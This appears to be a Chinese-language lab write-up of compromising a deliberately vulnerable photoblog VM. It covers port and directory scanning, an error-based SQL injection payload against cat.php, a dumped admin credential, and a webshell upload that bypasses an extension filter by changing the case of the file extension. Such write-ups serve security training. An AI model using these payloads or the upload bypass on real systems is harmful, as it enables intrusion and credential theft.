信息收集
端口扫描
# nmap -p- -sC -sV 192.168.111.141 -oA scans/allport
Nmap scan report for 192.168.111.141
Host is up (0.00043s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.5p1 Debian 6+squeeze2 (protocol 2.0)
| ssh-hostkey:
| 1024 f8:4a:f0:61:f1:00:51:74:35:6b:2d:48:97:47:1c:84 (DSA)
|_ 2048 e3:91:77:99:64:b6:cd:45:71:d1:6c:55:42:c6:43:55 (RSA)
80/tcp open http Apache httpd 2.2.16 ((Debian))
|_http-server-header: Apache/2.2.16 (Debian)
|_http-title: My Photoblog - last picture
MAC Address: 00:0C:29:3C:74:CE (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
目录爆破
# dirb http://192.168.111.141
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Jul 3 20:50:38 2020
URL_BASE: http://192.168.111.141/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.111.141/ ----
==> DIRECTORY: http://192.168.111.141/admin/
+ http://192.168.111.141/all (CODE:200|SIZE:2022)
+ http://192.168.111.141/cat (CODE:200|SIZE:1858)
+ http://192.168.111.141/cgi-bin/ (CODE:403|SIZE:291)
==> DIRECTORY: http://192.168.111.141/classes/
==> DIRECTORY: http://192.168.111.141/css/
+ http://192.168.111.141/footer (CODE:200|SIZE:185)
+ http://192.168.111.141/header (CODE:200|SIZE:796)
==> DIRECTORY: http://192.168.111.141/images/
+ http://192.168.111.141/index (CODE:200|SIZE:1343)
+ http://192.168.111.141/index.php (CODE:200|SIZE:1343)
+ http://192.168.111.141/server-status (CODE:403|SIZE:296)
+ http://192.168.111.141/show (CODE:200|SIZE:1320)
---- Entering directory: http://192.168.111.141/admin/ ----
+ http://192.168.111.141/admin/del (CODE:302|SIZE:0)
+ http://192.168.111.141/admin/footer (CODE:200|SIZE:19)
+ http://192.168.111.141/admin/header (CODE:200|SIZE:686)
+ http://192.168.111.141/admin/index (CODE:302|SIZE:0)
+ http://192.168.111.141/admin/index.php (CODE:302|SIZE:0)
+ http://192.168.111.141/admin/login (CODE:200|SIZE:1387)
+ http://192.168.111.141/admin/logout (CODE:302|SIZE:0)
+ http://192.168.111.141/admin/new (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.111.141/admin/uploads/
---- Entering directory: http://192.168.111.141/classes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.111.141/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.111.141/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.111.141/admin/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
发现一个目录遍历的问题,
前台sql注入
到处点点,发现一个sql注入,可以用报错注入
访问/cat.php?id=1 AND (EXTRACTVALUE(1,CONCAT(0x7C,@@basedir,0x7C)))
XPATH syntax error: '|/usr/|'
也可以用联合注入
列数为4,第二位有回显。已经可以用sqlmap一把梭, 也可以手工注熟悉下命令.
拿到管理员密码
Database: photoblog
Table: users
[1 entry]
+------+-------+---------------------------------------------+
| id | login | password |
+------+-------+---------------------------------------------+
| 1 | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
+------+-------+---------------------------------------------+
后台文件上传
登录后台,上传内容为php马的图片,用burp改后缀为Php(大小写绕过)
直接上AntSword拿到shell